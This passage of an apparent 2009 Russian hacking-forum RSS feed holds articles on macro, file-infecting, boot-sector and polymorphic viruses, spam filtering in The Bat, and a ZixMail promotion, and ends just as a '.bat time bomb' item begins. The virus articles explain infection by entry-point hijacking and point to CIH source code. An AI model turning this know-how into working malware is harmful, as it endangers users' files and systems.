						&lt;p&gt;И этому воспрепятствовать никак нельзя! Сейчас стандартом для распространения&lt;br /&gt;документов стал формат Word, электронных таблиц - Exel_ неудивительно, что&lt;br /&gt;распространение макровирусов приняло характер эпидемии.&lt;/p&gt;
						&lt;p&gt;Выходом является передача данных в &amp;quot;чистом&amp;quot; виде без макросов и любых автоматически&lt;br /&gt;исполняемых модулей. Например, Word поддерживает RTF формат, в котором распространение&lt;br /&gt;вирусов невозможно.&lt;/p&gt;
						&lt;p&gt;Однако, необходимо убедиться, что это именно RTF, поскольку активный вирус может&lt;br /&gt;перехватить управление и сохранить файл как документ ворд с макросами, но с&lt;br /&gt;расширением &#039;rft&#039;. Word проигнорирует несоответствие расширения с внутренним&lt;br /&gt;содержанием и вирус продолжит свое существование.&lt;/p&gt;
						&lt;p&gt;Но это не решает проблемы в том случае, когда требуется передача именно макросов или&lt;br /&gt;даже сложных программ на из основе. Например, для Exel существует много&lt;br /&gt;бизнес-программ, состоящих из тысяч строк кода. Затеряться в них вирусу не составит&lt;br /&gt;никаких трудностей. Причем, если исполняемые файлы инфицируются всего несколькими&lt;br /&gt;путями, то в макро-программы вирусы внедряются в любую точку кода или процедуры.&lt;br /&gt;Поэтому написание эвристических анализаторов представляет неразрешимую на сегодня&lt;br /&gt;проблему.&lt;/p&gt;
						&lt;p&gt;Браузеры так же поддерживают скриты Бацика и Java, не считая остальных команд&lt;br /&gt;появившихся в результате интеграции с операционной системой. Для них могут&lt;br /&gt;использоваться многие приведенные выше приемы прорыва за пределы виртуальной машины. И&lt;br /&gt;ведь Интернет и HTML вирусы уже существуют не первый день и наблюдают активное&lt;br /&gt;пополнение в своем полку.&lt;/p&gt;
						&lt;p&gt;Антивирусные средства не могут быть эффективными против них. Можно охватить&lt;br /&gt;одно-два-три распространенных приложения, но сколько при этом останутся за кадром, где&lt;br /&gt;вирусы смогут бесконтрольно плодится и делать все что им вздумается?&lt;/p&gt;
						&lt;p&gt;Решение проблемы заключается не в совершенствовании антивирусов, а в усилении&lt;br /&gt;безопасности со стороны разработчиков программных пакетов. Прежде всего необходимо&lt;br /&gt;раздельно сохранять макросы и содержимое документов. Причем макросы должны&lt;br /&gt;записываться в обычный текстовой файл, изучить которой можно средствами гарантирующими&lt;br /&gt;неискаженное отображение содержимого. Виртуальность интерпретаторов необходимо усилить&lt;br /&gt;и в первую очередь вирутализировать файловый ввод \ вывод или вообще отказаться от&lt;br /&gt;него перейдя к концепции синхронных и асинхронных потоков. Очень заманчиво&lt;br /&gt;воспользоваться появившимся в Windows 95 пространством имен. Суть его заключается в&lt;br /&gt;том, что приложения оперируют не с физическими файлами, а с объектами OLE. Грубо&lt;br /&gt;говоря можно сделать так, что при перезаписи файла потребуется разрешение от самого&lt;br /&gt;файла!&lt;/p&gt;
						&lt;p&gt;Но даже такие меры не позволят полностью искоренить вирусы, а только затормозить их&lt;br /&gt;развитие и немного обезопасить пользователя. Как бы ни совершенствовались системы&lt;br /&gt;защиты, всегда найдутся способы их обойти. Даже в тех случаях, когда это будет&lt;br /&gt;невозможно. Существуют же &amp;quot;психологические&amp;quot; вирусы. Да, на полном серьезен без шуток.&lt;br /&gt;Такие вирусы есть. Правда летальных исходов не было, но кто гарантирует, что для&lt;br /&gt;некоторых людей со слабым сердцем вирус окажется безвреден?&lt;/p&gt;
						&lt;p&gt;Разумеется, речь идет о так называемых &amp;quot;письмах&amp;quot; счастья и прочей подобной чепухе,&lt;br /&gt;посящей разослать себя по многочисленным адресами. И ведь рассылают. И не только&lt;br /&gt;рассылают! Еще форматируют жесткие диски и хватаются за сердце при сообщении &amp;quot;все ваши&lt;br /&gt;файлы заражены&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Злоумышленники часто пишут от чужого имени и предлагают выполнить команды в стиле&lt;br /&gt;&amp;quot;deltree&amp;quot; для удаления вируса с диска. Защититься от них практически невозможно. В IDA&lt;br /&gt;некоторые &amp;quot;насекомые&amp;quot; распространяются через человека, то есть сообщают какие операции&lt;br /&gt;стоит ему выполнить, что бы скрип заработал. Разумеется, что в ряде случаев эти&lt;br /&gt;требования выполняются даже высокопрофессиональными специалистами!&lt;/p&gt;
						&lt;p&gt;Что же тогда говорить о простых пользователях? В одной электронной библиотеке долгое&lt;br /&gt;время лежат файл в формате Word, при загрузке которого появлялось сообщение, что для&lt;br /&gt;его чтения нужно использовать другую версию программы или сделать такие то действия.&lt;br /&gt;Как нетрудно догадаться, если пользователь не был сильно продвинут в компьютерах, то&lt;br /&gt;скоро вирус оказывался на его жестком диске, вопреки всем системам безопасности. Вирус&lt;br /&gt;же сам просил пользователя совершить завуалированную последовательность действий,&lt;br /&gt;приводящую к их отключению.&lt;/p&gt;
						&lt;p&gt;А потому, разработчики антивирусов в равной мере должны защищаться как от вирусов, так&lt;br /&gt;и от самих пользователей. Впрочем, от последних даже сильнее. Необходимо по крайней&lt;br /&gt;мере использовать не отключаемую защиту и ни в коем случае не доверять пользователю&lt;br /&gt;полного контроля над системой.&lt;/p&gt;
						&lt;p&gt;Массовая компьютеризация привела к тому, что большинство пользователей не обладают&lt;br /&gt;даже минимальными познаниями своей вычислительной техники, да и администраторы&lt;br /&gt;частенько то же. До тех пор пока не повыситься уровень компьютерной грамотности&lt;br /&gt;ситуация не изменится к лучшему.&lt;/p&gt;
						&lt;p&gt;Вся беда заключается в том, что сложность программного обеспечения с каждым днем все&lt;br /&gt;растет, а вместе с ней и время необходимое для полного изучения. Если с интерфейсом&lt;br /&gt;кое-как методом проб и ошибок все же разбираются, то возможности интегрированных&lt;br /&gt;языков часто остаются &amp;quot;за кадром&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Известный редактор Мульти-Едит написан полностью на собственном языке и его&lt;br /&gt;возможности поистине безграничны. При этом редко кто хотя бы в общих чертах&lt;br /&gt;представляет себе, что это такое и какая опасность может грозить.&lt;/p&gt;
						&lt;p&gt;А плагины? Идея возможности наращивания функциональных возможностей приложения за счет&lt;br /&gt;подключения внешних модулей завоевала сердца всех разработчиков. Последние версии IDA&lt;br /&gt;так же поддерживают ее.&lt;/p&gt;
						&lt;p&gt;Парадоксально, что мало кто задумывается, что раз плагины содержат &amp;quot;голый&amp;quot; исполняемый&lt;br /&gt;код, то вирусы могут великолепно избирать их объектами для атаки. Или любой плагин&lt;br /&gt;может содержат закладку или троянский компонент.&lt;/p&gt;
						&lt;p&gt;Но вот только на вирусы их не поверяют. А впрочем, какие антивирусы это поддерживают?&lt;br /&gt;Десятки ни с чем не совместимых форматов не вызывают энтузиазма у разработчиков. А&lt;br /&gt;напрасно.&lt;/p&gt;
						&lt;p&gt;Широко известны случаи распространения вирусов через дополнения к самим антивирусам!&lt;br /&gt;Злоумышленнику не надо даже модифицировать файл, вызывая протест со стороны мониторов&lt;br /&gt;и дисковых ревизоров. Достаточно только скопировать его в нужный каталог или попросить&lt;br /&gt;об этом пользователя.&lt;/p&gt;
						&lt;p&gt;Что будет дальше? Это зависит только от фантазии и агрессивности злоумышленника.&lt;br /&gt;Технически противостоять ситуации антивирусная индустрия не в силах. Так закончится ли&lt;br /&gt;когда-нибудь это смутное время вирусных атак и эпидемий? Ведь победило же человечество&lt;br /&gt;чуму, холеру_ сейчас борется со СПИДом.&lt;/p&gt;
						&lt;p&gt;Чем же сложнее победить человеческие творения? Дело в том, что СПИД он один, а&lt;br /&gt;человечества очень много миллиардов. Как бы он ни мутировал и не изворачивался -&lt;br /&gt;победить его вопрос времени.&lt;/p&gt;
						&lt;p&gt;А компьютерные вирусы пишутся не один, а многими тысячами людей и еще больше хотя их&lt;br /&gt;писать, но в меру своих умственных способностей не могут. Вот так и рождаются все&lt;br /&gt;многочисленные троянские программы, банально форматирующие диск.&lt;/p&gt;
						&lt;p&gt;Специалистов по антивирусам гораздо меньше и они просто не в силах контролировать&lt;br /&gt;ситуацию, разрываясь между желанием раскрутить юзера на бабки, обеспечить себя работой&lt;br /&gt;на будущее ну и спасти человечество от эпидемии. Покупали бы люди их продукцию если бы&lt;br /&gt;постоянно ни слышали леденящие душу истории об очередной распространяющейся со&lt;br /&gt;скоростью лесного пожара, заразе?&lt;/p&gt;
						&lt;p&gt;Пока эта ситуация не измениться вирусы продолжат свое существование. Ведь мы страдаем&lt;br /&gt;не от программного кода, а от агрессии человеческой. Победить вирусов, это значит&lt;br /&gt;победить злобу на Земле. Но наступит ли такой момент, что ближний ближнему своему не&lt;br /&gt;возжелает зла? Ведь компьютер (вирус то есть) это просто инструмент. Точно такой как&lt;br /&gt;нож, кастет, пистолет.&lt;/p&gt;
						&lt;p&gt;Бессмысленно сражаться с вирусами. Бесполезно сажать и наказывать их авторов. Агрессия&lt;br /&gt;только умножает агрессию. Необходимо смотреть глубже и устранять те корни, от которых&lt;br /&gt;и идет желание причинить другому вред. Вирусы, как выход агрессии не самых худший&lt;br /&gt;вариант. Компьютерный террор оставляет после себя обратимые разрушения. Ведь все&lt;br /&gt;уничтоженные данные всего можно восстановить (ну пусть с большими или меньшими&lt;br /&gt;трудозатратами), а вот когда жертвами становятся живые люди, то оживить их даже&lt;br /&gt;усилиями всего человечества невозможно.&lt;/p&gt;
						&lt;p&gt;Но это уже не имеет отношения к компьютерам. А что антивирусы? Они должны оберегать&lt;br /&gt;пользователя от ошибки или неверного шага. Только тогда называться они уже будут&lt;br /&gt;&amp;quot;антиюзеры&amp;quot;. А что? Ведь пользователь свой главный враг. Никакой вирус не оживет, пока&lt;br /&gt;его не запустит человеческая рука не осведомленного в тонкостях программирования&lt;br /&gt;пользователя.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 13:13:02 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=28#p28</guid>
		</item>
		<item>
			<title>Вся правда о вирусах часть-2</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=27#p27</link>
			<description>&lt;p&gt;После написания первой части статьи мне захотелось продлить тему, в этой части я буду рассказывать про резидентные и загрузочные вирусы. Резидентные вирусы - это вирусы, которые после запуска зараженной программы копируют свой код в память и остаются там во время всего сеанса работы, такие вирусы намного заразнее остальных, так как успевают испортить больше файлов. Эти вирусы писать сложнее, чем другие, могут происходить конфликты оборудования при их выполнении, однако их создано очень много. Принцип заражения тот же, что и у нерезидентных вирусов.&lt;/p&gt;
						&lt;p&gt;Однако большее внимание я хочу уделить загрузочным вирусам, эти вирусы копируют себя в нулевой сектор нулевой дорожки, если это дискета, или в первый сектор нулевой дорожки если жесткий диск, активизируются они при загрузке, так как система автоматически исполняет код, находящийся в вышеупомянутых секторах, так называемых BOOT секторах (или MBR, хотя это не совсем одно и то же, но не буду вдаваться в подробности). Поэтому я советовал бы все дискеты защитить от записи, это физически не даст дисководу записать данные на дискету и предотвратит дальнейшее распространение. Эти вирусы нет так распространены, не так часто мы носим дискеты друг к другу. Из-за этого просто загрузочных вирусов мало, они почти все резидентные, и, как только система читает свеженькую незащищенную дискету, вирус ее заражает. Также такие вирусы часто бывают файлово-загрузочными, они могут распространяться и способами, описанными в предыдущей части статьи. В памяти после загрузки эти вирусы находятся в старших адресах основной памяти (та, что меньше мегабайта). Чтобы заразиться таким вирусом надо или запустить программу, зараженную им (файлово-загрузочный вирус), или загрузиться с зараженной дискеты (просто загрузочный или файлово-загрузочный), заразиться с дискеты, которая не была вставлена при загрузке невозможно, но если вирус уже находится в памяти, то он заразит эту дискету, так что еще раз повторюсь, защитите от записи хотя бы загрузочную дискету.&lt;/p&gt;
						&lt;p&gt;Есть еще так называемые полиморфные вирусы, которые каждый раз изменяют свой код так, что может не быть даже одинаковых цепочек байт, они могут быть любого типа, могут иметь функции и возможности нескольких классов вирусов, но эти вирусы очень сложны в написании, ведь надо обеспечить нормальную работу после превращения. Современные антивирусы способны если не обезвредить, то хотя бы предупредить пользователя о наличии вируса, благодаря эвристическому анализу, при котором код интерпретируется и, если антивирус предполагает, что это может быть вирус, запрещает доступ к этому файлу или просто предупреждает пользователя. На этом вроде все, осталось только сказать, чтобы вы оставляли свои пожелания и предложения у нас в гостевой книге, напишите там, какие статьи вы хотите увидеть.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 13:11:31 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=27#p27</guid>
		</item>
		<item>
			<title>Вся правда о вирусах часть-1</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=26#p26</link>
			<description>&lt;p&gt;Еще раз привет, мой друг, вот захотелось мне написать статью про компьютерные вирусы, ты скажешь &amp;quot;хе, нашли дурочка&amp;quot;, ан нет, не буду я тут писать про &amp;quot;вирусы&amp;quot;, которые стирают папочку MustDie, такой ты от балды и сам можешь написать, эти, так называемые вирусы, не размножаются, ну, разве что только по почте, однако они не могут заразить файлы. Так вот я и расскажу о настоящих Вирусах с большой буквы.&lt;/p&gt;
						&lt;p&gt;Такие вирусы пишутся в основном на ассемблере, или на худой конец на Си, именно поэтому они имеют такой маленький размер (вспомни знаменитый Чих, последняя версия которого занимает чуть больше килобайта). Ассемблер позволяет полностью взять под контроль систему, причем не важно, стоит на компе винда или старенький дос, все зависит от автора. Краткая классификация вирей. Есть несколько типов таких вирусов: COM-вирусы, заражающие только комики, эти вирусы самые простые из всех (достаточно только сказать, что COM, который грузится и выходит, занимает 2 байта, такую легче писать в блокноте, или хекс-редакторе), EXE-вирусы, которые обычно умеют заражать все исполняемые файлы, то есть Dos&#039;овские и виндозные NE (Win 3.x) и PE (Win 9x, ME, NT, 2000). Причем эти вирусы обычно пишутся профессиональными программистами, они имеют более сложную структуру и разрушительное действие (опять вспомним Win95.CIH, который полностью резидентный, он виснул на нулевом кольце привилегий процессора (есть такое у процов старше 286 в защищенном режиме, этот режим используют все современные ОСи), а операционку принижал в правах, вот так вот, винда отдыхает, кстати так делают некоторые продвинутые отладчики, например, SoftIce).&lt;/p&gt;
						&lt;p&gt;Теперь кое что о самом заражении, вирус ищет в директории все исполняемые файлы, которые он способен заразить, проверяет, не заражены ли они этим же вирусом, а потом записывает в определенное место в программе свой код, не весь, только тот, что ему нужен для размножения и деструктивных действий. Вирусы могут записать свой код в начало, середину или конец файла, проще всего реализовать последнее, из-за этого часто размер программ слегка увеличивается, некоторые антивирусы проверяют контрольные суммы своих исполняемых файлов, и если они не совпадают с нормальными, выдают юзеру, что сам антивирус заражен. Есть и такие вирусы, которые записывают свой код в пустоты в файле, правда из таких я знаю только знаменитый Чих, файлы, зараженные этим вирусом, не увеличиваются в размерах.&lt;/p&gt;
						&lt;p&gt;Подробнее о том, как вирус внедряется в файл. Некоторые более-менее продвинутые скажут, что если изменить EXE или COM файл, то ни фига не будет работать, в большинстве случаев, если делать это кривыми руками, то так и случится, но ведь мы рассматриваем вирусы, на то они и вирусы.... В общем заражение происходит так: вирус находит нужный файл, который подходит ему для заражения, записывает в какое-то место свой код, а вот дальше самое интересное и, наверное, самое сложное, точка входа в программу (место кода откуда прога начинает пахать) изменяется вирусом так, чтобы вместо программы начинал работать его (вируса) код, после того как он отработал (заразил другие файлы или ченить напортил), он передает управление программе, но чаще просто восстанавливает в памяти начало программы, и устанавливает регистр EIP процессора (такая штука которая указывает на адрес памяти следующей команды) на настоящую точку в проге, это все делается в оперативной памяти, на диске же файл не изменяется, таким образом если программа не проверяет свой файл на диске на изменения, она не сможет узнать, что она заражена, ведь в памяти нормальный код. Все это происходит с огромной скоростью, так что даже на самой допотопной машине невозможно заметить изменения работы.&lt;/p&gt;
						&lt;p&gt;После всего этого вирус может начать деструктивные действия или ожидать даты, по наступлению которой он их начнет, чаще так и делается, чтобы вирус успевал распространиться, ведь, например, если он все удаляет с жесткого диска при первом запуске, то никто больше его не скопирует (или он сам не скопируется). Все, что выполняет вирус, зависит только от фантазии программера, вирус может удалить пару файлов, вывести сообщение, а может стереть все с диска и разрушить FlashBIOS (можете скачать в сети исходники чиха и посмотреть как он это делает).&lt;/p&gt;
						&lt;p&gt;А как делаются антивирусы? Я скажу, что разные по-разному, но сидят дядьки в кабинетах, изучают изменения в файлах после заражения, изучают исходники вируса, потом скидывают это в базу и получается антивирус. Конечно это весьма символически написано, но статья не об этом, пишите на thm@inbox.ru если хотите увидеть статью про создание антивирусов и их работу. На этом извольте попрощаться.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 13:10:56 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=26#p26</guid>
		</item>
		<item>
			<title>Борьба со спамом в The Bat</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=25#p25</link>
			<description>&lt;p&gt;Дмитрий Турецкий&lt;/p&gt;
						&lt;p&gt;Электронная почта сегодня является, пожалуй, самым важным сервисом Интернета. По крайней мере, если бы пришлось выбирать, то я бы оставил именно ее. Расписывать почему это так, думаю, смысла не имеет, стоит отметить только два ее полезных свойства: дешевизна и скорость. &lt;br /&gt;Однако, по почте приходят не только письма от друзей и знакомых, но и такая неприятная штука, как спам. А точнее, всевозможные коммерческие предложения, предложения вступить в очередную &amp;quot;пирамиду&amp;quot;, посетить страничку, &amp;quot;письма счастья&amp;quot; и т.д. и т.п. В принципе, большой беды в этом нет - ну подумаешь, прочитал да удалил, но... На самом деле не совсем так. &lt;br /&gt;Во-первых, количество приходящего спама имеет тенденцию к увеличению. Когда вам приходит одно бредовое письмо в неделю к нему можно относиться как к шутке. Когда число таких писем переваливает за сотню в день - это вызывает как чисто технические сложности (спаммеры не особо ограничивают размер своих писем, а 100 писем по 50 Кб это пять мегабайт или полтора часа работы модема), так и достаточно сильное раздражение, а нервные клетки, как известно, не восстанавливаются. Во-вторых, спам, увы, достаточно эффективен и благодаря ему наверх вылезают компании и люди с весьма сомнительной репутацией и качеством услуг. В-третьих, в Интернете и так много мусора, а благодаря спаму его становится только больше - ведь спамят не только почтовые ящики, но и конференции, доски объявлений, поисковики... &lt;br /&gt;Можно ли от спама избавиться? И да и нет. Нет - потому что уж больно это лакомый кусок для тех, кого моральные принципы не волнуют. Разослать пару миллионов писем вполне реально, риска - почти никакого (при соблюдении элементарных мер предосторожности), а даже если отреагирует на письмо один из тысячи - эффект окажется вполне заметен и окупит расходы. Надеяться на то, что у людей появится совесть - не стоит. &lt;br /&gt;Можно попытаться сделать так, чтобы у авторов спама не было желания им пользоваться. Скажем, звонить по указанному телефону и говорить, что спаммить - нехорошо, а заодно и ничего не покупать. Увы, тоже тупиковый путь - если это явление (отказ от покупки) станет достаточно массовым, то спам быстро превратится в инструмент устранения конкурентов (такое уже случалось). &lt;br /&gt;Остается только один путь - свести эффективность спама к минимуму, желательно, к нулю. Но от раздражения-то никуда не денешься... Значит надо постараться сделать так, чтобы спаммерские письма просто к нам не приходили. Но как? &lt;br /&gt;Практически все советы по борьбе со спамом сводятся к рекомендациям завести ящик в какой-нибудь бесплатной службе, а когда на него начнет приходить слишком много спама, просто этот ящик закрыть и завести новый. Увы, этот способ применим далеко не всегда. Прежде всего, во многих случаях, ящик должен оставаться неизменным - скажем, тот, который на визитке, или корпоративный... Затем - многие службы сейчас просто не пропускают письма, отправленные с бесплатных сервисов - тоже, мера борьбы со спамом. Значит, придется светить настоящий адрес и, следовательно, рано или поздно он попадет в спаммерские базы. Ну и наконец, не все же такие умные с самого начала... У многих адрес уже &amp;quot;засвечен&amp;quot;. Что же им, так и читать весь приходящий бред? &lt;br /&gt;О том, как с рассылкой спама борются провайдеры я писать не буду - судя по количеству приходящего спама меры эти не очень эффективные. Хотя, наверное, если бы их не было, то все было бы еще хуже. Тем более, что и среди провайдеров всегда найдутся те, кто согласится закрыть глаза на действия спаммера (за деньги, разумеется)... Значит, спасение утопающих - дело рук самих утопающих. &lt;br /&gt;Разумеется, на рынке есть программы, занимающиеся фильтрацией почты. Но наиболее гибкие и эффективные из них рассчитаны на использование на сервере и простому пользователю не помогут. Есть службы, которые могут принимать вашу почту и фильтровать ее от спама, используя различные, в целом достаточно эффективные технологии, но такие службы, увы, платные. Причем, платить им надо регулярно. &lt;br /&gt;Что же делать обычному пользователю, который сидит дома с модемом, не имеет кучи лишних денег и не хочет читать письма с предложениями посетить страничку очередной пирамиды или купить чудодейственный молоток, умеющий забивать кривые гвозди? Давайте попробуем заставить нашу почтовую программу нам помочь... &lt;br /&gt;Дальнейшее я буду писать опираясь на почтовик The Bat!, который на мой взгляд, сегодня является одним из наиболее удобных в использовании. Одно из его достоинств - развитая система фильтров.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://pitachok.net/img/xak_53.jpg&quot; alt=&quot;http://pitachok.net/img/xak_53.jpg&quot; /&gt;&lt;br /&gt;Начнем мы с того, что создадим папку &amp;quot;спам&amp;quot;. Мы не будем спам сразу удалять, т.к. при настройке фильтров почти наверняка получится так, что отфильтруются какие-то полезные письма, а вместо этого будем переносить отфильтрованные письма в эту папку. А уже в свойствах папки пропишем, что письма в ней надо хранить, скажем, 10 дней а потом - удалять.&lt;/p&gt;
						&lt;p&gt;Теперь займемся собственно фильтрами. Открываем меню Ящик - Настройка сортировщика писем и создаем новый фильтр с именем &amp;quot;Spam&amp;quot;. В качестве действия указываем перемещение писем в созданную нами папку спам. Теперь надо определить, какие именно письма мы хотим отфильтровать.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://pitachok.net/img/xak_54.jpg&quot; alt=&quot;http://pitachok.net/img/xak_54.jpg&quot; /&gt;&lt;br /&gt;Первым делом, отсечем самый явный спам, а именно, письма, которые отправлены не персонально нам, а куче адресатов. Для этого, в разделе Сигнальные строки указываем наши адреса, а флажок Наличие устанавливаем в Нет. Т.е. те письма, которые не содержат нашего адреса в поле получателя будут отфильтрованы. Но... Попытавшись запустить такой фильтр мы обнаружим, что наши любимые рассылки тоже были посчитаны спамом. Поэтому там же дописываем адреса отправителей, которые мы хотим сохранить. Сюда же можно включить и другие правила, описывающие нужные нам письма, проставив везде, что письмо должно быть отфильтровано, если интересующих нас признаков не обнаружено.&lt;/p&gt;
						&lt;p&gt;Так, от &amp;quot;тупого&amp;quot; спама мы избавились, уже легче. Но спаммеры люди хитрые и в средствах не очень ограниченные, поэтому они отправляют нам и персональные письма. Однако Bat - умный и умеет использовать несколько правил. Есть там в настройках фильтра вкладка Alternatives, вот туда мы и пойдем... Причем, если строки внутри одного набора правил объединяются по правилу &amp;quot;и&amp;quot;, то альтернативные фильтры работают как &amp;quot;или&amp;quot;. Первый набор правил, созданный нами, Bat прочитает как &amp;quot;фильтровать письмо, если оно не содержит нашего адреса в качестве получателя И не отправлено службой нужных нам рассылок&amp;quot;. &lt;br /&gt;Теперь попробуем победить остальной спам. Тут дело обстоит несколько сложнее - написать какое-то универсальное правило нам вряд ли удастся, так что придется действовать индивидуально. Благо, альтернативных наборов правил можно заводить сколько угодно. Главное - найти тот признак, который позволит отличить спам от полезного письма. Это может быть отправитель, строка &amp;quot;casino&amp;quot; в теме письма, &amp;quot;This is a one time mailing&amp;quot; в самом письме и т.д. Здесь фильр должен уже выставляться не на отсутствие, как в первом наборе правил, а на присутствие строки. Для каждой группы спама заводим отдельный альтернативный фильтр и... с удивлением наблюдаем как мусор постепенно исчезает из нашей почты.&lt;/p&gt;
						&lt;p&gt;Разумеется, подобная схема - не панацея. Новые спаммеры будут прорываться через наш фильтр, но не так часто. В принципе, все сведется как раз к тому одному-двум письмам в неделю, о которых я писал выше. Естественно, то что я описал - это самый простой вариант. Если вы знаете, что такое регулярные выражения и умеете ими пользоваться, то фильтры можно сделать значительно надежнее, но даже этого варианта вполне хватит, чтобы облегчить себе жизнь. Большим плюсом Бата является то, что он умеет проверять не только заголовки писем, но и их содержимое, так что фильтровать можно и по номеру телефона спаммера, и по адресу его сайта, и по названию фирмы... &lt;br /&gt;А для особо надоедливых - есть у Бата и возможность удалять письма прямо на сервере, не скачивая их. Но с этой функцией стоит обращаться очень осторожно - неправильно прописанный фильтр может убить и полезные письма. А вы об этом уже не узнаете... Именно для того, чтобы избежать подобных потерь мы и создавали специальную папку для спама, помните? &lt;br /&gt;Ну а теперь, осталось только включить написанный фильтр и раз в неделю мельком проглядывать спам-папку, чтобы убедиться, что в нее не попало что-то нужное. Да при приходе очередной рекламки от горе-коммерсантов не забывать добавлять ее к списку фильтров...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 13:02:43 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=25#p25</guid>
		</item>
		<item>
			<title>ZixMail - ваши секреты не узнает никто!</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=24#p24</link>
			<description>&lt;p&gt;Любой человек, который хотя бы иногда пользуется электронной почтой, наверняка не раз&lt;br /&gt;задавался вопросом: &amp;quot;А насколько моя переписка защищена от посторонних глаз?&amp;quot; Не&lt;br /&gt;только у нас в стране, но и всё мировое Интернет-сообщество уже насколько лет&lt;br /&gt;обсуждают эту проблему.&lt;br /&gt;Недавно австралийским Сенатом одобрена Билль-поправка об ASIO (Australia Security&lt;br /&gt;Internet Objects - Австралийский проект безопасности) от 1999 года, предоставляющая&lt;br /&gt;федеральным властям право на проникновение в частные компьютерные системы с целью&lt;br /&gt;надзора.&lt;br /&gt;Аналогичную ситуацию можно наблюдать и в России. По информации Lenta.ru и газеты&lt;br /&gt;Moscow Times, установка аппаратуры, позволяющей ФСБ читать электронную почту россиян и&lt;br /&gt;следить за их интернет-активностью, начата практически всеми российскими провайдерами&lt;br /&gt;Интернета, а многие провайдеры уже завершили внедрение у себя &amp;quot;уха Большого Брата&amp;quot;.&lt;br /&gt;Речь идет о так называемой Системе Оперативно-Розыскных Мероприятий, или СОРМ. Эта&lt;br /&gt;система обязует каждого российского провайдера Интернета предоставить местному&lt;br /&gt;отделению ФСБ доступ ко всему электронному трафику, а также протянуть в ФСБ отдельную&lt;br /&gt;линию связи и установить специальную аппаратуру, с помощью которой органы могли бы&lt;br /&gt;просматривать электронный трафик, а также проверять почтовые ящики пользователей.&lt;br /&gt;В Германии в то же время продолжает функционировать система &amp;quot;Эшелон&amp;quot;, аналогичная&lt;br /&gt;российскому СОРМу, которая действует в соответствии с внутренним списком ключевых&lt;br /&gt;слов, используемых при поиске. Таким образом, оказывается нарушенным закон о свободе&lt;br /&gt;слова. Кстати, стоит отметить и то, что до сих пор функционирует и развивается&lt;br /&gt;глобальная система ЦРУ, базирующаяся в США, Европе, Австралии, где на мощных&lt;br /&gt;компьютерах сквозь мелкое сито пропускаются тысячи писем, посылаемые через анонимные&lt;br /&gt;серверы бесплатной электронной почты.&lt;br /&gt;Так что перед отправкой очередного электронного письма стоит задуматься не только над&lt;br /&gt;правилами орфографии, но и над смыслом - никто не может гарантировать, что вы не под&lt;br /&gt;колпаком.&lt;/p&gt;
						&lt;p&gt;Чтобы как-то защитится от пристального внимания спецслужб, а так же другой,&lt;br /&gt;неравнодушной к чужим секретам публики, специалистами компании ZixMail.com была&lt;br /&gt;разработана специальная программа, надёжно шифрующая электронные письма пользователей.&lt;br /&gt;Так же эта программа обеспечит и то, что ваше сообщение прочтёт именно тот человек,&lt;br /&gt;которому оно предназначено, что делается с помощью специального секретного&lt;br /&gt;кода-пароля.&lt;/p&gt;
						&lt;p&gt;ZixMail совместима почти со всеми системами электронной почты, как программами&lt;br /&gt;(Microsoft Outlook, IBM Lotus Notes, Netscape Communicator, Qualcomm Eudora, Novell&lt;br /&gt;GroupWise), так и Web-based, т. е. &amp;quot;Базирующиеся в Интернете&amp;quot;, - например: AOL, MSN&lt;br /&gt;Hotmail, Yahoo!-Mail, Netscape WebMail и другими.&lt;/p&gt;
						&lt;p&gt;Эта программа будет полезна при передаче финансовой и любой другой информации,&lt;br /&gt;представляющую интеллектуальную собственность. Сможет предотвратить возможность&lt;br /&gt;просмотра вашей корреспонденции персоналом почтовых серверов и избежать утечки&lt;br /&gt;конфиденциальной информации. В бизнесе сможет обеспечить сохранность коммерческой&lt;br /&gt;тайны. Ну а в простой, частной жизни, обеспечит защиту вашей личной переписки.&lt;/p&gt;
						&lt;p&gt;До конца 2000-го года программа распространяется бесплатно. В следующем году&lt;br /&gt;ZixMail.com планирует перейти на платный сервис, так что, если вас интересует не&lt;br /&gt;только секретность, но и экономия, загрузите программу сейчас.&lt;/p&gt;
						&lt;p&gt;Для этого необходимо нажать десь: &amp;quot; [INLINE] Zixmail.com &amp;quot; и, переместившись на сайт&lt;br /&gt;компании, жмите на закладку Free Download. На сайте Zixmail.com много материал,&lt;br /&gt;позволяющего понять, как работает программа (есть даже видеоклип!), но так или иначе,&lt;br /&gt;после загрузки и инсталляции её на свой компьютер, вы увидите, что начать с ней&lt;br /&gt;работать - совсем не сложно.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 13:00:57 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=24#p24</guid>
		</item>
		<item>
			<title>Бомба замедленного действия</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=23#p23</link>
			<description>&lt;p&gt;Вот вам простой пример *.bat файла: &lt;/p&gt;
